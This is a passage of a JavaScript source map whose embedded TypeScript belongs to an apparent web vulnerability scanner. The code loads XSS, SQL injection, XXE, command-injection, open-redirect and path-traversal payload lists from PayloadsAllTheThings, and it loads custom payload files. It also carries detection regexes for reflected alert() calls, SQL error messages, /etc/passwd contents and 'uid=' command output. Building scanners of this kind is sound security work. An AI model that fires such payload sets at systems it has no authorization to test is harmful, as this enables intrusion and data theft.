\"https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/refs/heads/master/XXE%20Injection/Intruders/xxe_payloads.txt\",\n \"command-injection\":\n \"https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/refs/heads/master/Command%20Injection/Intruder/command_exec.txt\",\n \"open-redirect\":\n \"https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/refs/heads/master/Open%20Redirect/Intruder/Open-Redirect-payloads.txt\",\n \"path-traversal\":\n \"https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/refs/heads/master/Directory%20Traversal/Intruder/traversals-8-deep-exotic-encoding.txt\",\n};\n\n/**\n * Map PayloadBox types to our categories\n */\nconst CATEGORY_MAP: Record<PayloadBoxType, PayloadCategory> = {\n xss: \"xss\",\n \"sql-injection\": \"sqli\",\n xxe: \"xxe\",\n \"command-injection\": \"command-injection\",\n \"open-redirect\": \"open-redirect\",\n \"path-traversal\": \"path-traversal\",\n};\n\n/**\n * Cache for fetched payloads\n */\nconst cache: Map<PayloadBoxType, RuntimePayload> = new Map();\n\n/**\n * Get available PayloadBox types\n */\nexport function getPayloadBoxTypes(): PayloadBoxType[] {\n return Object.keys(PAYLOADBOX_URLS) as PayloadBoxType[];\n}\n\n/**\n * Check if a type is a valid PayloadBox type\n */\nexport function isPayloadBoxType(type: string): type is PayloadBoxType {\n return type in PAYLOADBOX_URLS;\n}\n\n/**\n * Load payloads from PayloadBox\n *\n * @param type - PayloadBox type (xss, sql-injection, etc.)\n * @param limit - Maximum number of payloads to include\n * @param fetchFn - Fetch function to use (for testing/DI)\n */\nexport async function loadPayloadBox(\n type: string,\n limit: number = 50,\n fetchFn: typeof fetch = globalThis.fetch,\n): Promise<RuntimePayload> {\n // Validate type\n if (!isPayloadBoxType(type)) {\n throw new Error(\n `Unknown PayloadBox type: ${type}. Available: ${getPayloadBoxTypes().join(\", \")}`,\n );\n }\n\n // Check cache\n const cached = cache.get(type);\n if (cached) {\n return cached;\n }\n\n const url = PAYLOADBOX_URLS[type];\n\n try {\n const response = await fetchFn(url);\n if (!response.ok) {\n throw new Error(\n `Failed to fetch: ${response.status} ${response.statusText}`,\n );\n }\n\n const text = await response.text();\n const payloads = text\n .split(\"\\n\")\n .map((line) => line.trim())\n .filter((line) => line && !line.startsWith(\"#\"))\n .slice(0, limit);\n\n if (payloads.length === 0) {\n throw new Error(`No payloads found in ${type}`);\n }\n\n const payload: RuntimePayload = {\n name: `payloadbox:${type}`,\n category: CATEGORY_MAP[type],\n description: `PayloadsAllTheThings ${type} - ${payloads.length} payloads`,\n payloads,\n detectPatterns: getDefaultPatterns(type),\n source: \"payloadbox\",\n };\n\n // Cache it\n cache.set(type, payload);\n return payload;\n } catch (err) {\n throw new Error(\n `Failed to fetch PayloadBox ${type}: ${err instanceof Error ? err.message : String(err)}`,\n );\n }\n}\n\n/**\n * Get default detection patterns for PayloadBox types\n */\nfunction getDefaultPatterns(type: PayloadBoxType): RegExp[] {\n switch (type) {\n case \"xss\":\n return [\n /<script[^>]*>alert\$/i,\n /onerror\\s*=\\s*alert\\(/i,\n /onload\\s*=\\s*alert\\(/i,\n /javascript:alert\\(/i,\n ];\n case \"sql-injection\":\n return [\n /sql.*syntax/i,\n /mysql.*error/i,\n /ORA-\\d{5}/i,\n /pg_query/i,\n /sqlite.*error/i,\n ];\n case \"xxe\":\n return [/root:.*:0:0/i, /\\[fonts\\]/i];\n case \"command-injection\":\n return [/uid=\\d+\\([\\w]+\$/i, /root:.*:0:0/i];\n case \"open-redirect\":\n return []; // Detected by redirect behavior\n case \"path-traversal\":\n return [/root:.*:0:0/i, /\\[fonts\\]/i, /\\[extensions\\]/i];\n default:\n return [];\n }\n}\n\n/**\n * Clear PayloadBox cache\n */\nexport function clearPayloadBoxCache(): void {\n cache.clear();\n}\n","/**\n * File Loader\n * Loads custom payloads from YAML/JSON files\n */\n\nimport { readFile } from \"node:fs/promises\";\nimport { resolve, isAbsolute, extname } from \"node:path\";\nimport YAML from \"yaml\";\nimport { z } from \"zod\";\nimport type { RuntimePayload, PayloadCategory } from \"@vulcn/engine\";\n\n/**\n * Valid payload categories\n */\nconst PAYLOAD_CATEGORIES: PayloadCategory[] = [\n \"xss\",\n \"sqli\",\n \"ssrf\",\n \"xxe\",\n \"command-injection\",\n \"path-traversal\",\n \"open-redirect\",\n \"custom\",\n];\n\n/**\n * Schema for a single custom payload\n */\nconst CustomPayloadSchema = z.object({\n name: z.string().min(1),\n category: z.enum(\n PAYLOAD_CATEGORIES as [PayloadCategory, ...PayloadCategory[]],\n ),\n description: z.string().optional(),\n payloads: z.array(z.string()).min(1),\n detectPatterns: z.array(z.string()).optional(),\n});\n\n/**\n * Schema for a payload file (can contain multiple payloads)\n */\nconst PayloadFileSchema = z.object({\n version: z.string().optional(),\n payloads: z.array(CustomPayloadSchema),\n});\n\n/**\n * Load multiple payload files\n */\nexport async function loadFromFiles(\n filePaths: string[],\n): Promise<RuntimePayload[]> {\n const payloads: RuntimePayload[] = [];\n\n for (const filePath of filePaths) {\n const loaded = await loadFromFile(filePath);\n payloads.push(...loaded);\n }\n\n return payloads;\n}\n\n/**\n * Load payloads from a single file\n */\nexport async function loadFromFile(\n filePath: string,\n): Promise<RuntimePayload[]> {\n const resolved = isAbsolute(filePath)\n ? filePath\n : resolve(process.cwd(), filePath);\n\n const content = await readFile(resolved, \"utf-8\");\n const ext = extname(resolved).toLowerCase();\n\n // Parse based on extension\n let data: unknown;\n if (ext === \".json\") {\n data = JSON.parse(content);\n } else if (ext === \".yml\" || ext === \".yaml\") {\n data = YAML.parse(content);\n } else {\n throw new Error(\n `Unsupported file extension: ${ext}. Use .yml, .yaml, or .json`,\n );\n }\n\n // Parse and validate\n return parsePayloadData(data);\n}\n\n/**\n * Parse and validate payload data\n */\nfunction parsePayloadData(data: unknown): RuntimePayload[] {\n const dataObj = data as Record<string, unknown>;\n\n let parsed;\n\n if (Array.isArray(data)) {\n // Array of payload objects\n parsed = { version: \"1\", payloads: data };\n } else if (dataObj?.name && dataObj?.category) {\n // Single payload object (has name and category)\n parsed = { version: \"1\", payloads: [CustomPayloadSchema.parse(data)] };\n } else if (dataObj?.payloads && Array.isArray(dataObj.payloads)) {\n // File schema with payloads array\n parsed = PayloadFileSchema.parse(data);\n } else {\n throw new Error(\n \"Invalid payload file format. Expected: array of payloads, file schema, or single payload object\",\n );\n }\n\n // Convert to RuntimePayload[]\n return parsed.payloads.map(\n (p): RuntimePayload => ({\n name: p.name,\n category: p.category,\n description: p.description || `Custom payload: ${p.name}`,\n payloads: p.payloads,\n detectPatterns: parseDetectPatterns(p.detectPatterns),\n source: \"custom\",\n }),\n );\n}\n\n/**\n * Parse detect patterns from strings to RegExp\n */\nfunction parseDetectPatterns(patterns?: string[]): RegExp[] {\n if (!patterns || patterns.length === 0) {\n return [];\n }\n\n const regexps: RegExp[] = [];\n for (const pattern of patterns) {\n try {\n regexps.push(new RegExp(pattern, \"i\"));\n } catch {\n console.warn(`Invalid regex pattern: ${pattern}`);\n }\n }\n return regexps;\n}\n"],"mappings":"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","names":["z","z"]}